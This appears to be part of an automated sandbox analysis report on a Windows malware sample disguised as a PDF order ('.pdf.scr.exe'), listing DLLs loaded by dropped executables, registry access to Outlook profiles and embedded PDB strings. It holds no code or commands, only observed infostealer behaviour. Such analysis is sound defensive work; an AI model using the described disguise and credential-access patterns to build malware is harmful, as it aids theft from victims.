Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\server02.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: gpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: vaultcli.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: dpapi.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\neworigin.exe	Section loaded: windowscodecs.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: xmllite.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: edputil.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cmdext.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\timeout.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: wsock32.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\bothsided\surmit.exe	Section loaded: webio.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\TrojanAI.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\ACCApi\TrojanAIbot.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: version.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: tapi32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: credui.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxstiff.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: winhttp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: mpr.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: secur32.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ntmarta.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: fxsresm.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: ualapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: windows.storage.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: wldp.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: slc.dll
Source: C:\Windows\System32\FXSSVC.exe	Section loaded: sppc.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtctm.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtcprx.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: msdtclog.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mtxclu.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: winmm.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: clusapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: xolehlp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: mswsock.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: cryptsp.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: resutils.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\msdtc.exe	Section loaded: ktmw32.dll

Source: C:\Windows\System32\AppVClient.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{52BC3999-6E52-4E8A-87C4-0A2A0CC359B1}\InProcServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\server02.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Source: Order SMG 201906 20190816order.pdf.scr.exe

Static file information: File size 2267648 > 1048576

Source: Order SMG 201906 20190816order.pdf.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: D:\DCB\CBT_Main\BuildResults\bin\Win32\Release\armsvc.pdb source: Order SMG 201906 20190816order.pdf.scr.exe, 00000000.00000003.1667931149.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\AcrobatInfo.pdb source: alg.exe, 00000002.00000003.1792845772.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: ssh-agent.pdb source: elevation_service.exe, 00000008.00000003.3008858965.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb444 source: alg.exe, 00000002.00000003.1960507002.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\TextExtractor.pdb source: alg.exe, 00000002.00000003.1960507002.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: msiexec.pdbGCTL source: elevation_service.exe, 00000008.00000003.2867483561.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: c:\jenkins\workspace\8-2-build-windows-i586-cygwin-sans-NAS\jdk8u381\237\build\windows-i586\jdk\objs\jjs_objs\jjs.pdb source: elevation_service.exe, 00000008.00000003.3239648950.0000000000730000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mavinject32.pdbGCTL source: alg.exe, 00000002.00000003.2183358754.00000000015D0000.00000004.00001000.00020000.00000000.sdmp, alg.exe, 00000002.00000003.2186527465.00000000015E0000.00000004.00001000.00020000.00000000.sdmp, elevation_service.exe, 00000008.00000003.3193969354.0000000001460000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PresentationFontCache.pdb source: elevation_service.exe, 00000008.00000003.2847524053.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: PerceptionSimulationService.pdb source: elevation_service.exe, 00000008.00000003.2885089406.0000000000830000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: plugin-container.pdb source: alg.exe, 00000002.00000003.2377892123.00000000004C0000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: surmit.exe, 00000007.00000003.1720282746.0000000004B80000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 00000007.00000003.1721982682.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 00000019.00000003.1842133284.0000000004B70000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 00000019.00000003.1845782469.0000000004D10000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 0000001C.00000003.1871704458.0000000004A90000.00000004.00001000.00020000.00000000.sdmp, surmit.exe, 0000001C.00000003.1874030134.0000000004C30000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: D:\T\BuildResults\bin\Release_x64\WebInstaller\AcroMiniServicesUpdater.pdb source: alg.exe, 00000002.00000003.1931467591.0000000001550000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: MsSense.pdbGCTL source: elevation_service.exe, 00000008.00000003.2930503642.0000000000830000.00000004.00001000.00020000.00000000.sdmp
